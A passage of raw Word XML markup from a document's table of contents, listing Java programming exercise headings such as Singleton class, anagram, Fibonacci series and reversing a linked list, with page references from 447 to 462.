              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307792 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>447</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77B9F6A6" w14:textId="3B79352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9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Singleton class</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307793 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>448</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34383FC8" w14:textId="66015EF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9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Find missing number from array</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307794 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>448</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CF3B0B3" w14:textId="1E530C0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9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Anagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307795 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>449</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BCEA316" w14:textId="2328B9C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9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Swap two numbers without using a third variable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307796 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>450</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="215357BD" w14:textId="25D0869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9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Print even and odd numbers without using the modulus operator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307797 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>450</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1559B1D9" w14:textId="5F17BDE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9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Find third largest number from array using java 8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307798 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>450</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D08908C" w14:textId="4A8688A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79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Print even and odd numbers using java 8 stream API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307799 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>451</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C9E25F9" w14:textId="3E3AB56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0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Fibonacci series</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307800 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>451</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A239681" w14:textId="6334B6F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0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Reverse array in groups of a given size k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307801 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>451</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62518C8E" w14:textId="5EF92DD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0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Print factorials of natural numbers from 1 to 10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307802 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>452</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D8A1E8A" w14:textId="285A6C7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0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Reverse the integer array without using loops? Using recursion?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307803 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>453</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66C2971B" w14:textId="2B488BD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0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Perform Overriding methods in parent child</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307804 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>453</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="522BD421" w14:textId="62ABC1A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0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Return the student object if gender is male? (filter)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307805 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>454</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7675D059" w14:textId="70710FF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0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Rearrange String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307806 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>455</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20C6E8C9" w14:textId="495AC7B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0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Given a set of numbers {3, 35, 56, 2, 95, 10, 65, 150, 165, 23, 65, 18, 57}, find all subsets whose sum equals 28.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307807 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>455</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09DD23A4" w14:textId="23C137E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0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Count set bits in an integer Ex: 13 -&gt; 1101 Print number of 1’s in the given binary number?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307808 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>456</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03ACFC09" w14:textId="42AFEFB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0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Check bracket balanced or not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307809 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>457</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E4D9441" w14:textId="064C329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1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Print prime factors for given numbers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307810 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>458</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="213D30D2" w14:textId="372708E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1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Print prime numbers in range? Ex: 24 to 100</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307811 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>458</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4386AC66" w14:textId="2AF64D8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1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Iterate ArrayList in different ways</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307812 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>459</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2090A32B" w14:textId="49CF9B0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1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Reverse a singly linked list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307813 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>460</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67D0617D" w14:textId="4E9330D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1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First repeating number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307814 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>461</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4038F371" w14:textId="79A0E4C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1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Print occurrence of each character in String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307815 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>462</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63E019A1" w14:textId="35FD44D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1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Merge two sorted linked list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307816 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>462</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27441EB0" w14:textId="58B9F08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1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Sort array with decreasing frequency of element</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307817 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
